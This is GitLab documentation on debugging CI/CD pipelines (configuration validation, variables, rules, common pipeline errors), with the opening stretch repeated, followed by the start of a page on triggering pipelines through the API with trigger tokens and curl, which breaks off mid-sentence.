[`artifacts:reports`](yaml/artifacts_reports.md) are not available for download by default, but could also contain information to help with debugging. Use the same technique to make these reports available for inspection: ```yaml job1: script: - rspec --format RspecJunitFormatter --out rspec.xml artifacts: reports: junit: rspec.xml paths: - rspec.xmp ``` {{< alert type="warning" >}} Do not save tokens, passwords, or other sensitive information in artifacts, as they could be viewed by any user with access to the pipelines. {{< /alert >}} ### Run the job's commands locally You can use a tool like [Rancher Desktop](https://rancherdesktop.io/) or similar alternatives to run the job's container image on your local machine. Then, run the job's `script` commands in the container and verify the behavior. ### Troubleshoot a failed job with Root Cause Analysis You can use GitLab Duo Root Cause Analysis in GitLab Duo Chat to [troubleshoot failed CI/CD jobs](../user/gitlab_duo_chat/examples.md#troubleshoot-failed-cicd-jobs-with-root-cause-analysis). ## Job configuration issues A lot of common pipeline issues can be fixed by analyzing the behavior of the `rules` or `only/except` configuration used to [control when jobs are added to a pipeline](jobs/job_control.md). You shouldn't use these two configurations in the same pipeline, as they behave differently. It's hard to predict how a pipeline runs with this mixed behavior. `rules` is the preferred choice for controlling jobs, as `only` and `except` are no longer being actively developed. If your `rules` or `only/except` configuration makes use of [predefined variables](variables/predefined_variables.md) like `CI_PIPELINE_SOURCE`, `CI_MERGE_REQUEST_ID`, you should [verify them](#verify-variables) as the first troubleshooting step. ### Jobs or pipelines don't run when expected The `rules` or `only/except` keywords are what determine whether or not a job is added to a pipeline. If a pipeline runs, but a job is not added to the pipeline, it's usually due to `rules` or `only/except` configuration issues. If a pipeline does not seem to run at all, with no error message, it may also be due to `rules` or `only/except` configuration, or the `workflow: rules` keyword. If you are converting from `only/except` to the `rules` keyword, you should check the [`rules` configuration details](yaml/_index.md#rules) carefully. The behavior of `only/except` and `rules` is different and can cause unexpected behavior when migrating between the two. The [common `if` clauses for `rules`](jobs/job_rules.md#common-if-clauses-with-predefined-variables) can be very helpful for examples of how to write rules that behave the way you expect. If a pipeline contains only jobs in the `.pre` or `.post` stages, it does not run. There must be at least one other job in a different stage. ### Unexpected behavior when `.gitlab-ci.yml` file contains a byte order mark (BOM) A [UTF-8 Byte-Order Mark (BOM)](https://en.wikipedia.org/wiki/Byte_order_mark) in the `.gitlab-ci.yml` file or other included configuration files can lead to incorrect pipeline behavior. The byte order mark affects parsing of the file, causing some configuration to be ignored - jobs might be missing, and variables could have the wrong values. Some text editors could insert a BOM character if configured to do so. If your pipeline has confusing behavior, you can check for the presence of BOM characters with a tool capable of displaying them. The pipeline editor cannot display the characters, so you must use an external tool. See [issue 354026](https://gitlab.com/gitlab-org/gitlab/-/issues/354026) for more details. ### A job with the `changes` keyword runs unexpectedly A common reason a job is added to a pipeline unexpectedly is because the `changes` keyword always evaluates to true in certain cases. For example, `changes` is always true in certain pipeline types, including scheduled pipelines and pipelines for tags. The `changes` keyword is used in combination with [`only/except`](yaml/deprecated_keywords.md#onlychanges--exceptchanges) or [`rules`](yaml/_index.md#ruleschanges). It's recommended to only use `changes` with `if` sections in `rules` or `only/except` configuration that ensures the job is only added to branch pipelines or merge request pipelines. ### Two pipelines run at the same time Two pipelines can run when pushing a commit to a branch that has an open merge request associated with it. Usually one pipeline is a merge request pipeline, and the other is a branch pipeline. This situation is usually caused by the `rules` configuration, and there are several ways to [prevent duplicate pipelines](jobs/job_rules.md#avoid-duplicate-pipelines). ### No pipeline or the wrong type of pipeline runs Before a pipeline can run, GitLab evaluates all the jobs in the configuration and tries to add them to all available pipeline types. A pipeline does not run if no jobs are added to it at the end of the evaluation. If a pipeline did not run, it's likely that all the jobs had `rules` or `only/except` that blocked them from being added to the pipeline. If the wrong pipeline type ran, then the `rules` or `only/except` configuration should be checked to make sure the jobs are added to the correct pipeline type. For example, if a merge request pipeline did not run, the jobs may have been added to a branch pipeline instead. It's also possible that your [`workflow: rules`](yaml/_index.md#workflow) configuration blocked the pipeline, or allowed the wrong pipeline type. If you are using pull mirroring, you can check the [troubleshooting entry for pull mirroring pipelines](../user/project/repository/mirror/troubleshooting.md#pull-mirroring-is-not-triggering-pipelines). ### Pipeline with many jobs fails to start A Pipeline that has more jobs than the instance's defined [CI/CD limits](../administration/settings/continuous_integration.md#set-cicd-limits) fails to start. To reduce the number of jobs in a single pipeline, you can split your `.gitlab-ci.yml` configuration into more independent [parent-child pipelines](pipelines/pipeline_architectures.md#parent-child-pipelines). ## Pipeline warnings Pipeline configuration warnings are shown when you: - [Validate configuration with the CI Lint tool](yaml/lint.md). - [Manually run a pipeline](pipelines/_index.md#run-a-pipeline-manually). ### `Job may allow multiple pipelines to run for a single action` warning When you use [`rules`](yaml/_index.md#rules) with a `when` clause without an `if` clause, multiple pipelines may run. Usually this occurs when you push a commit to a branch that has an open merge request associated with it. To [prevent duplicate pipelines](jobs/job_rules.md#avoid-duplicate-pipelines), use [`workflow: rules`](yaml/_index.md#workflow) or rewrite your rules to control which pipelines can run. ## Pipeline errors ### `A CI/CD pipeline must run and be successful before merge` message This message is shown if the [**Pipelines must succeed**](../user/project/merge_requests/auto_merge.md#require-a-successful-pipeline-for-merge) setting is enabled in the project and a pipeline has not yet run successfully. This also applies if the pipeline has not been created yet, or if you are waiting for an external CI service. If you don't use pipelines for your project, then you should disable **Pipelines must succeed** so you can accept merge requests. ### `Checking ability to merge automatically` message If your merge request is stuck with a `Checking ability to merge automatically` message that does not disappear after a few minutes, you can try one of these workarounds: - Refresh the merge request page. - Close & Re-open the merge request. - Rebase the merge request with the `/rebase` [quick action](../user/project/quick_actions.md). - If you have already confirmed the merge request is ready to be merged, you can merge it with the `/merge` quick action. This issue is [resolved](https://gitlab.com/gitlab-org/gitlab/-/issues/229352) in GitLab 15.5. ### `Checking pipeline status` message This message displays with a spinning status icon ({{< icon name="spinner" >}}) when the merge request does not yet have a pipeline associated with the latest commit. This might be because: - GitLab hasn't finished creating the pipeline yet. - You are using an external CI service and GitLab hasn't heard back from the service yet. - You are not using CI/CD pipelines in your project. - You are using CI/CD pipelines in your project, but your configuration prevented a pipeline from running on the source branch for your merge request. - The latest pipeline was deleted (this is a [known issue](https://gitlab.com/gitlab-org/gitlab/-/issues/214323)). - The source branch of the merge request is on a private fork. After the pipeline is created, the message updates with the pipeline status. In some of these cases, the message might get stuck with the icon spinning endlessly if the [**Pipelines must succeed**](../user/project/merge_requests/auto_merge.md#require-a-successful-pipeline-for-merge) setting is enabled. See [issue 334281](https://gitlab.com/gitlab-org/gitlab/-/issues/334281) for more details. ### `Project <group/project> not found or access denied` message This message is shown if configuration is added with [`include`](yaml/_index.md#include) and either: - The configuration refers to a project that can't be found. - The user that is running the pipeline is unable to access any included projects. To resolve this, check that: - The path of the project is in the format `my-group/my-project` and does not include any folders in the repository. - The user running the pipeline is a [member of the projects](../user/project/members/_index.md#add-users-to-a-project) that contain the included files. Users must also have the [permission](../user/permissions.md#cicd) to run CI/CD jobs in the same projects. ### `The parsed YAML is too big` message This message displays when the YAML configuration is too large or nested too deeply. YAML files with a large number of includes, and thousands of lines overall, are more likely to hit this memory limit. For example, a YAML file that is 200 kb is likely to hit the default memory limit. To reduce the configuration size, you can: - Check the length of the expanded CI/CD configuration in the pipeline editor's [Full configuration](pipeline_editor/_index.md#view-full-configuration) tab. Look for duplicated configuration that can be removed or simplified. - Move long or repeated `script` sections into standalone scripts in the project. - Use [parent and child pipelines](pipelines/downstream_pipelines.md#parent-child-pipelines) to move some work to jobs in an independent child pipeline. On GitLab Self-Managed, you can [increase the size limits](../administration/instance_limits.md#maximum-size-and-depth-of-cicd-configuration-yaml-files). ### `500` error when editing the `.gitlab-ci.yml` file A loop of included configuration files can cause a `500` error when editing the `.gitlab-ci.yml` file with the [web editor](../user/project/repository/web_editor.md). Ensure that included configuration files do not create a loop of references to each other. ### `Failed to pull image` messages {{< history >}} - **Allow access to this project with a CI_JOB_TOKEN** setting [renamed to **Limit access to this project**](https://gitlab.com/gitlab-org/gitlab/-/issues/411406) in GitLab 16.3. {{< /history >}} A runner might return a `Failed to pull image` message when trying to pull a container image in a CI/CD job. The runner authenticates with a [CI/CD job token](jobs/ci_job_token.md) when fetching a container image defined with [`image`](yaml/_index.md#image) from another project's container registry. If the job token settings prevent access to the other project's container registry, the runner returns an error message. For example: - ```plaintext WARNING: Failed to pull image with policy "always": Error response from daemon: pull access denied for registry.example.com/path/to/project, repository does not exist or may require 'docker login': denied: requested access to the resource is denied ``` - ```plaintext WARNING: Failed to pull image with policy "": image pull failed: rpc error: code = Unknown desc = failed to pull and unpack image "registry.example.com/path/to/project/image:v1.2.3": failed to resolve reference "registry.example.com/path/to/project/image:v1.2.3": pull access denied, repository does not exist or may require authorization: server message: insufficient_scope: authorization failed ``` These errors can happen if the following are both true: - The [**Limit access to this project**](jobs/ci_job_token.md#limit-job-token-scope-for-public-or-internal-projects) option is enabled in the private project hosting the image. - The job attempting to fetch the image is running in a project that is not listed in the private project's allowlist. To resolve this issue, add any projects with CI/CD jobs that fetch images from the container registry to the target project's [job token allowlist](jobs/ci_job_token.md#add-a-group-or-project-to-the-job-token-allowlist). These errors might also happen when trying to use a [project access token](../user/project/settings/project_access_tokens.md) to access images in another project. Project access tokens are scoped to one project, and therefore cannot access images in other projects. You must use [a different token type](../security/tokens/_index.md) with wider scope. ### `Something went wrong on our end` message or `500` error when running a pipeline You might receive the following pipeline errors: - A `Something went wrong on our end` message when pushing or creating merge requests. - A `500` error when using the API to trigger a pipeline. These errors can happen if records of internal IDs become out of sync after a project is imported. To resolve this, see the [workaround in issue 352382](https://gitlab.com/gitlab-org/gitlab/-/issues/352382#workaround). ### `config should be an array of hashes` error message You might see an error similar to the following when using [`!reference` tags](yaml/yaml_optimization.md#reference-tags) with the [`parallel:matrix` keyword](yaml/_index.md#parallelmatrix): ```plaintext This GitLab CI configuration is invalid: jobs:my_job_name:parallel:matrix config should be an array of hashes. ``` The `parallel:matrix` keyword does not support multiple `!reference` tags at the same time. Try using [YAML anchors](yaml/yaml_optimization.md#anchors) instead. [Issue 439828](https://gitlab.com/gitlab-org/gitlab/-/issues/439828) proposes improving `!reference` tag support in `parallel:matrix`.
--- stage: Verify group: Pipeline Authoring info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments title: Debugging CI/CD pipelines description: Configuration validation, warnings, errors, and troubleshooting. breadcrumbs: - doc - ci --- {{< details >}} - Tier: Free, Premium, Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated {{< /details >}} GitLab provides several tools to help make it easier to debug your CI/CD configuration. If you are unable to resolve pipeline issues, you can get help from: - The [GitLab community forum](https://forum.gitlab.com/) - GitLab [Support](https://about.gitlab.com/support/) If you are having issues with a specific CI/CD feature, see the related troubleshooting section for that feature: - [Caching](caching/_index.md#troubleshooting). - [CI/CD job tokens](jobs/ci_job_token.md#troubleshooting). - [Container registry](../user/packages/container_registry/troubleshoot_container_registry.md). - [Docker](docker/docker_build_troubleshooting.md). - [Downstream pipelines](pipelines/downstream_pipelines_troubleshooting.md). - [Environments](environments/_index.md#troubleshooting). - [GitLab Runner](https://docs.gitlab.com/runner/faq/). - [ID tokens](secrets/id_token_authentication.md#troubleshooting). - [Jobs](jobs/job_troubleshooting.md). - [Job artifacts](jobs/job_artifacts_troubleshooting.md). - [Merge request pipelines](pipelines/mr_pipeline_troubleshooting.md), [merged results pipelines](pipelines/merged_results_pipelines.md#troubleshooting), and [merge trains](pipelines/merge_trains.md#troubleshooting). - [Pipeline editor](pipeline_editor/_index.md#troubleshooting). - [Variables](variables/variables_troubleshooting.md). - [YAML `includes` keyword](yaml/includes.md#troubleshooting). - [YAML `script` keyword](yaml/script_troubleshooting.md). ## Debugging techniques ### Verify syntax An early source of problems can be incorrect syntax. The pipeline shows a `yaml invalid` badge and does not start running if any syntax or formatting problems are found. #### Edit `.gitlab-ci.yml` with the pipeline editor The [pipeline editor](pipeline_editor/_index.md) is the recommended editing experience (rather than the single file editor or the Web IDE). It includes: - Code completion suggestions that ensure you are only using accepted keywords. - Automatic syntax highlighting and validation. - The [CI/CD configuration visualization](pipeline_editor/_index.md#visualize-ci-configuration), a graphical representation of your `.gitlab-ci.yml` file. #### Edit `.gitlab-ci.yml` locally If you prefer to edit your pipeline configuration locally, you can use the GitLab CI/CD schema in your editor to verify basic syntax issues. Any [editor with Schemastore support](https://www.schemastore.org/json/#editors) uses the GitLab CI/CD schema by default. If you need to link to the schema directly, use this URL: ```plaintext https://gitlab.com/gitlab-org/gitlab/-/blob/master/app/assets/javascripts/editor/schema/ci.json ``` To see the full list of custom tags covered by the CI/CD schema, check the latest version of the schema. #### Verify syntax with CI Lint tool You can use the [CI Lint tool](yaml/lint.md) to verify that the syntax of a CI/CD configuration snippet is correct. Paste in full `.gitlab-ci.yml` files or individual job configurations, to verify the basic syntax. When a `.gitlab-ci.yml` file is present in a project, you can also use the CI Lint tool to [simulate the creation of a full pipeline](yaml/lint.md#simulate-a-pipeline). It does deeper verification of the configuration syntax. ### Use pipeline names Use [`workflow:name`](yaml/_index.md#workflowname) to give names to all your pipeline types, which makes it easier to identify pipelines in the pipelines list. For example: ```yaml variables: PIPELINE_NAME: "Default pipeline name" workflow: name: '$PIPELINE_NAME' rules: - if: '$CI_PIPELINE_SOURCE == "merge_request_event"' variables: PIPELINE_NAME: "Merge request pipeline" - if: '$CI_PIPELINE_SOURCE == "schedule" && $PIPELINE_SCHEDULE_TYPE == "hourly_deploy"' variables: PIPELINE_NAME: "Hourly deployment pipeline" - if: '$CI_PIPELINE_SOURCE == "schedule"' variables: PIPELINE_NAME: "Other scheduled pipeline" - if: '$CI_COMMIT_BRANCH == $CI_DEFAULT_BRANCH' variables: PIPELINE_NAME: "Default branch pipeline" - if: '$CI_COMMIT_BRANCH =~ /^\d{1,2}\.\d{1,2}-stable$/' variables: PIPELINE_NAME: "Stable branch pipeline" ``` ### CI/CD variables #### Verify variables A key part of troubleshooting CI/CD is to verify which variables are present in a pipeline, and what their values are. A lot of pipeline configuration is dependent on variables, and verifying them is one of the fastest ways to find the source of a problem. [Export the full list of variables](variables/variables_troubleshooting.md#list-all-variables) available in each problematic job. Check if the variables you expect are present, and check if their values are what you expect. #### Use variables to add flags to CLI commands You can define CI/CD variables that are not used in standard pipeline runs, but can be used for debugging on demand. If you add a variable like in the following example, you can add it during manual runs of the [pipeline](pipelines/_index.md#run-a-pipeline-manually) or [individual job](jobs/job_control.md#run-a-manual-job) to modify the command's behavior. For example: ```yaml my-flaky-job: variables: DEBUG_VARS: "" script: - my-test-command $DEBUG_VARS /test-dirs ``` In this example, `DEBUG_VARS` is blank by default in standard pipelines. If you need to debug the job's behavior, run the pipeline manually and set `DEBUG_VARS` to `--verbose` for additional output. ### Dependencies Dependency-related issues are another common source of unexpected issues in pipelines. #### Verify dependency versions To validate that the correct versions of dependencies are being used in jobs, you can output them before running the main script commands. For example: ```yaml job: before_script: - node --version - yarn --version script: - my-javascript-tests.sh ``` #### Pin versions While you might want to always use the latest version of a dependency or image, an update could include breaking changes unexpectedly. Consider pinning key dependencies and images to avoid surprise changes. For example: ```yaml variables: ALPINE_VERSION: '3.18.6' job1: image: alpine:$ALPINE_VERSION # This will never change unexpectedly script: - my-test-script.sh job2: image: alpine:latest # This might suddenly change script: - my-test-script.sh ``` You should still regularly check the dependency and image updates, as there might be important security updates. Then you can manually update the version as part of a process that verifies the updated image or dependency still works with your pipeline. ### Verify job output #### Make output verbose If you use `--silent` to reduce the amount of output in a job log, it can make it difficult to identify what went wrong in a job. Additionally, consider using `--verbose` when possible, for additional details. ```yaml job1: script: - my-test-tool --silent # If this fails, it might be impossible to identify the issue. - my-other-test-tool --verbose # This command will likely be easier to debug. ``` #### Save output and reports as artifacts Some tools might generate files that are only needed while the job is running, but the content of these files could be used for debugging. You can save them for later analysis with [`artifacts`](yaml/_index.md#artifacts): ```yaml job1: script: - my-tool --json-output my-output.json artifacts: paths: - my-output.json ``` Reports configured with [`artifacts:reports`](yaml/artifacts_reports.md) are not available for download by default, but could also contain information to help with debugging. Use the same technique to make these reports available for inspection: ```yaml job1: script: - rspec --format RspecJunitFormatter --out rspec.xml artifacts: reports: junit: rspec.xml paths: - rspec.xmp ``` {{< alert type="warning" >}} Do not save tokens, passwords, or other sensitive information in artifacts, as they could be viewed by any user with access to the pipelines. {{< /alert >}} ### Run the job's commands locally You can use a tool like [Rancher Desktop](https://rancherdesktop.io/) or similar alternatives to run the job's container image on your local machine. Then, run the job's `script` commands in the container and verify the behavior. ### Troubleshoot a failed job with Root Cause Analysis You can use GitLab Duo Root Cause Analysis in GitLab Duo Chat to [troubleshoot failed CI/CD jobs](../user/gitlab_duo_chat/examples.md#troubleshoot-failed-cicd-jobs-with-root-cause-analysis). ## Job configuration issues A lot of common pipeline issues can be fixed by analyzing the behavior of the `rules` or `only/except` configuration used to [control when jobs are added to a pipeline](jobs/job_control.md). You shouldn't use these two configurations in the same pipeline, as they behave differently. It's hard to predict how a pipeline runs with this mixed behavior. `rules` is the preferred choice for controlling jobs, as `only` and `except` are no longer being actively developed. If your `rules` or `only/except` configuration makes use of [predefined variables](variables/predefined_variables.md) like `CI_PIPELINE_SOURCE`, `CI_MERGE_REQUEST_ID`, you should [verify them](#verify-variables) as the first troubleshooting step. ### Jobs or pipelines don't run when expected The `rules` or `only/except` keywords are what determine whether or not a job is added to a pipeline. If a pipeline runs, but a job is not added to the pipeline, it's usually due to `rules` or `only/except` configuration issues. If a pipeline does not seem to run at all, with no error message, it may also be due to `rules` or `only/except` configuration, or the `workflow: rules` keyword. If you are converting from `only/except` to the `rules` keyword, you should check the [`rules` configuration details](yaml/_index.md#rules) carefully. The behavior of `only/except` and `rules` is different and can cause unexpected behavior when migrating between the two. The [common `if` clauses for `rules`](jobs/job_rules.md#common-if-clauses-with-predefined-variables) can be very helpful for examples of how to write rules that behave the way you expect. If a pipeline contains only jobs in the `.pre` or `.post` stages, it does not run. There must be at least one other job in a different stage. ### Unexpected behavior when `.gitlab-ci.yml` file contains a byte order mark (BOM) A [UTF-8 Byte-Order Mark (BOM)](https://en.wikipedia.org/wiki/Byte_order_mark) in the `.gitlab-ci.yml` file or other included configuration files can lead to incorrect pipeline behavior. The byte order mark affects parsing of the file, causing some configuration to be ignored - jobs might be missing, and variables could have the wrong values. Some text editors could insert a BOM character if configured to do so. If your pipeline has confusing behavior, you can check for the presence of BOM characters with a tool capable of displaying them. The pipeline editor cannot display the characters, so you must use an external tool. See [issue 354026](https://gitlab.com/gitlab-org/gitlab/-/issues/354026) for more details. ### A job with the `changes` keyword runs unexpectedly A common reason a job is added to a pipeline unexpectedly is because the `changes` keyword always evaluates to true in certain cases. For example, `changes` is always true in certain pipeline types, including scheduled pipelines and pipelines for tags. The `changes` keyword is used in combination with [`only/except`](yaml/deprecated_keywords.md#onlychanges--exceptchanges) or [`rules`](yaml/_index.md#ruleschanges). It's recommended to only use `changes` with `if` sections in `rules` or `only/except` configuration that ensures the job is only added to branch pipelines or merge request pipelines. ### Two pipelines run at the same time Two pipelines can run when pushing a commit to a branch that has an open merge request associated with it. Usually one pipeline is a merge request pipeline, and the other is a branch pipeline. This situation is usually caused by the `rules` configuration, and there are several ways to [prevent duplicate pipelines](jobs/job_rules.md#avoid-duplicate-pipelines). ### No pipeline or the wrong type of pipeline runs Before a pipeline can run, GitLab evaluates all the jobs in the configuration and tries to add them to all available pipeline types. A pipeline does not run if no jobs are added to it at the end of the evaluation. If a pipeline did not run, it's likely that all the jobs had `rules` or `only/except` that blocked them from being added to the pipeline. If the wrong pipeline type ran, then the `rules` or `only/except` configuration should be checked to make sure the jobs are added to the correct pipeline type. For example, if a merge request pipeline did not run, the jobs may have been added to a branch pipeline instead. It's also possible that your [`workflow: rules`](yaml/_index.md#workflow) configuration blocked the pipeline, or allowed the wrong pipeline type. If you are using pull mirroring, you can check the [troubleshooting entry for pull mirroring pipelines](../user/project/repository/mirror/troubleshooting.md#pull-mirroring-is-not-triggering-pipelines). ### Pipeline with many jobs fails to start A Pipeline that has more jobs than the instance's defined [CI/CD limits](../administration/settings/continuous_integration.md#set-cicd-limits) fails to start. To reduce the number of jobs in a single pipeline, you can split your `.gitlab-ci.yml` configuration into more independent [parent-child pipelines](pipelines/pipeline_architectures.md#parent-child-pipelines). ## Pipeline warnings Pipeline configuration warnings are shown when you: - [Validate configuration with the CI Lint tool](yaml/lint.md). - [Manually run a pipeline](pipelines/_index.md#run-a-pipeline-manually). ### `Job may allow multiple pipelines to run for a single action` warning When you use [`rules`](yaml/_index.md#rules) with a `when` clause without an `if` clause, multiple pipelines may run. Usually this occurs when you push a commit to a branch that has an open merge request associated with it. To [prevent duplicate pipelines](jobs/job_rules.md#avoid-duplicate-pipelines), use [`workflow: rules`](yaml/_index.md#workflow) or rewrite your rules to control which pipelines can run. ## Pipeline errors ### `A CI/CD pipeline must run and be successful before merge` message This message is shown if the [**Pipelines must succeed**](../user/project/merge_requests/auto_merge.md#require-a-successful-pipeline-for-merge) setting is enabled in the project and a pipeline has not yet run successfully. This also applies if the pipeline has not been created yet, or if you are waiting for an external CI service. If you don't use pipelines for your project, then you should disable **Pipelines must succeed** so you can accept merge requests. ### `Checking ability to merge automatically` message If your merge request is stuck with a `Checking ability to merge automatically` message that does not disappear after a few minutes, you can try one of these workarounds: - Refresh the merge request page. - Close & Re-open the merge request. - Rebase the merge request with the `/rebase` [quick action](../user/project/quick_actions.md). - If you have already confirmed the merge request is ready to be merged, you can merge it with the `/merge` quick action. This issue is [resolved](https://gitlab.com/gitlab-org/gitlab/-/issues/229352) in GitLab 15.5. ### `Checking pipeline status` message This message displays with a spinning status icon ({{< icon name="spinner" >}}) when the merge request does not yet have a pipeline associated with the latest commit. This might be because: - GitLab hasn't finished creating the pipeline yet. - You are using an external CI service and GitLab hasn't heard back from the service yet. - You are not using CI/CD pipelines in your project. - You are using CI/CD pipelines in your project, but your configuration prevented a pipeline from running on the source branch for your merge request. - The latest pipeline was deleted (this is a [known issue](https://gitlab.com/gitlab-org/gitlab/-/issues/214323)). - The source branch of the merge request is on a private fork. After the pipeline is created, the message updates with the pipeline status. In some of these cases, the message might get stuck with the icon spinning endlessly if the [**Pipelines must succeed**](../user/project/merge_requests/auto_merge.md#require-a-successful-pipeline-for-merge) setting is enabled. See [issue 334281](https://gitlab.com/gitlab-org/gitlab/-/issues/334281) for more details. ### `Project <group/project> not found or access denied` message This message is shown if configuration is added with [`include`](yaml/_index.md#include) and either: - The configuration refers to a project that can't be found. - The user that is running the pipeline is unable to access any included projects. To resolve this, check that: - The path of the project is in the format `my-group/my-project` and does not include any folders in the repository. - The user running the pipeline is a [member of the projects](../user/project/members/_index.md#add-users-to-a-project) that contain the included files. Users must also have the [permission](../user/permissions.md#cicd) to run CI/CD jobs in the same projects. ### `The parsed YAML is too big` message This message displays when the YAML configuration is too large or nested too deeply. YAML files with a large number of includes, and thousands of lines overall, are more likely to hit this memory limit. For example, a YAML file that is 200 kb is likely to hit the default memory limit. To reduce the configuration size, you can: - Check the length of the expanded CI/CD configuration in the pipeline editor's [Full configuration](pipeline_editor/_index.md#view-full-configuration) tab. Look for duplicated configuration that can be removed or simplified. - Move long or repeated `script` sections into standalone scripts in the project. - Use [parent and child pipelines](pipelines/downstream_pipelines.md#parent-child-pipelines) to move some work to jobs in an independent child pipeline. On GitLab Self-Managed, you can [increase the size limits](../administration/instance_limits.md#maximum-size-and-depth-of-cicd-configuration-yaml-files). ### `500` error when editing the `.gitlab-ci.yml` file A loop of included configuration files can cause a `500` error when editing the `.gitlab-ci.yml` file with the [web editor](../user/project/repository/web_editor.md). Ensure that included configuration files do not create a loop of references to each other. ### `Failed to pull image` messages {{< history >}} - **Allow access to this project with a CI_JOB_TOKEN** setting [renamed to **Limit access to this project**](https://gitlab.com/gitlab-org/gitlab/-/issues/411406) in GitLab 16.3. {{< /history >}} A runner might return a `Failed to pull image` message when trying to pull a container image in a CI/CD job. The runner authenticates with a [CI/CD job token](jobs/ci_job_token.md) when fetching a container image defined with [`image`](yaml/_index.md#image) from another project's container registry. If the job token settings prevent access to the other project's container registry, the runner returns an error message. For example: - ```plaintext WARNING: Failed to pull image with policy "always": Error response from daemon: pull access denied for registry.example.com/path/to/project, repository does not exist or may require 'docker login': denied: requested access to the resource is denied ``` - ```plaintext WARNING: Failed to pull image with policy "": image pull failed: rpc error: code = Unknown desc = failed to pull and unpack image "registry.example.com/path/to/project/image:v1.2.3": failed to resolve reference "registry.example.com/path/to/project/image:v1.2.3": pull access denied, repository does not exist or may require authorization: server message: insufficient_scope: authorization failed ``` These errors can happen if the following are both true: - The [**Limit access to this project**](jobs/ci_job_token.md#limit-job-token-scope-for-public-or-internal-projects) option is enabled in the private project hosting the image. - The job attempting to fetch the image is running in a project that is not listed in the private project's allowlist. To resolve this issue, add any projects with CI/CD jobs that fetch images from the container registry to the target project's [job token allowlist](jobs/ci_job_token.md#add-a-group-or-project-to-the-job-token-allowlist). These errors might also happen when trying to use a [project access token](../user/project/settings/project_access_tokens.md) to access images in another project. Project access tokens are scoped to one project, and therefore cannot access images in other projects. You must use [a different token type](../security/tokens/_index.md) with wider scope. ### `Something went wrong on our end` message or `500` error when running a pipeline You might receive the following pipeline errors: - A `Something went wrong on our end` message when pushing or creating merge requests. - A `500` error when using the API to trigger a pipeline. These errors can happen if records of internal IDs become out of sync after a project is imported. To resolve this, see the [workaround in issue 352382](https://gitlab.com/gitlab-org/gitlab/-/issues/352382#workaround). ### `config should be an array of hashes` error message You might see an error similar to the following when using [`!reference` tags](yaml/yaml_optimization.md#reference-tags) with the [`parallel:matrix` keyword](yaml/_index.md#parallelmatrix): ```plaintext This GitLab CI configuration is invalid: jobs:my_job_name:parallel:matrix config should be an array of hashes. ``` The `parallel:matrix` keyword does not support multiple `!reference` tags at the same time. Try using [YAML anchors](yaml/yaml_optimization.md#anchors) instead. [Issue 439828](https://gitlab.com/gitlab-org/gitlab/-/issues/439828) proposes improving `!reference` tag support in `parallel:matrix`.
https://docs.gitlab.com/ci/triggers
https://gitlab.com/gitlab-org/gitlab/-/tree/master/doc/ci/_index.md
2025-08-13
doc/ci/triggers
[ "doc", "ci", "triggers" ]
_index.md
Verify
Pipeline Authoring
To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments
Trigger pipelines with the API
null
{{< details >}} - Tier: Free, Premium, Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated {{< /details >}} To trigger a pipeline for a specific branch or tag, you can use an API call to the [pipeline triggers API endpoint](../../api/pipeline_triggers.md). If you are [migrating to GitLab CI/CD](../migration/plan_a_migration.md), you can trigger GitLab CI/CD pipelines by calling the API endpoint from the other provider's jobs. For example, as part of a migration from [Jenkins](../migration/jenkins.md) or [CircleCI](../migration/circleci.md). When authenticating with the API, you can use: - A [pipeline trigger token](#create-a-pipeline-trigger-token) to trigger a branch or tag pipeline with the [pipeline triggers API endpoint](../../api/pipeline_triggers.md). - A [CI/CD job token](../jobs/ci_job_token.md) to [trigger a multi-project pipeline](../pipelines/downstream_pipelines.md#trigger-a-multi-project-pipeline-by-using-the-api). - Another [token with API access](../../security/tokens/_index.md) to create a new pipeline with the [project pipeline API endpoint](../../api/pipelines.md#create-a-new-pipeline). ## Create a pipeline trigger token You can trigger a pipeline for a branch or tag by generating a pipeline trigger token and using it to authenticate an API call. The token impersonates a user's project access and permissions. Prerequisites: - You must have at least the Maintainer role for the project. To create a trigger token: 1. On the left sidebar, select **Search or go to** and find your project. 1. Select **Settings > CI/CD**. 1. Expand **Pipeline trigger tokens**. 1. Select **Add new token** 1. Enter a description and select **Create pipeline trigger token**. - You can view and copy the full token for all triggers you have created. - You can only see the first 4 characters for tokens created by other project members. {{< alert type="warning" >}} It is a security risk to save tokens in plain text in public projects, or store them in a way that malicious users could access them. A leaked trigger token could be used to force an unscheduled deployment, attempt to access CI/CD variables, or other malicious uses. [Masked CI/CD variables](../variables/_index.md#mask-a-cicd-variable) help improve the security of trigger tokens. For more information about keeping tokens secure, see the [security considerations](../../security/tokens/_index.md#security-considerations). {{< /alert >}} ## Trigger a pipeline After you [create a pipeline trigger token](#create-a-pipeline-trigger-token), you can use it to trigger pipelines with a tool that can access the API, or a webhook. ### Use cURL You can use cURL to trigger pipelines with the [pipeline triggers API endpoint](../../api/pipeline_triggers.md). For example: - Use a multiline cURL command: ```shell curl --request POST \ --form token=<token> \ --form ref=<ref_name> \ "https://gitlab.example.com/api/v4/projects/<project_id>/trigger/pipeline" ``` - Use cURL and pass the `<token>` and `<ref_name>` in the query string: ```shell curl --request POST \ "https://gitlab.example.com/api/v4/projects/<project_id>/trigger/pipeline?token=<token>&ref=<ref_name>" ``` In each example, replace: - The URL with `https://gitlab.com` or the URL of your instance. - `<token>` with your trigger token. - `<ref_name>` with a branch or tag name, like `main`. - `<project_id>` with your project ID, like `123456`. The project ID is displayed on the [project overview page](../../user/project/working_with_projects.md#find-the-project-id). ### Use a CI/CD job You can use a CI/CD job with a pipeline trigger token to trigger pipelines when another pipeline runs. For example, to trigger a pipeline on the `main` branch of `project-B` when a tag is created in `project-A`, add the following job to project A's `.gitlab-ci.yml` file: ```yaml trigger_pipeline: stage: deploy script: - 'curl --fail --request POST --form token=$MY_TRIGGER_TOKEN --form ref=main "${CI_API_V4_URL}/projects/123456/trigger/pipeline"' rules: - if: $CI_COMMIT_TAG environment: production ``` In this example: - `1234` is the project ID for `project-B`. The project ID is displayed on the [project overview page](../../user/project/working_with_projects.md#find-the-project-id). - The [`rules`](../yaml/_index.md#rules) cause the job to run every time a tag is added to `project-A`. - `MY_TRIGGER_TOKEN` is a [masked CI/CD variable](../variables/_index.md#mask-a-cicd-variable) that contains the trigger token. ### Use a webhook To trigger a pipeline from another project's webhook, use 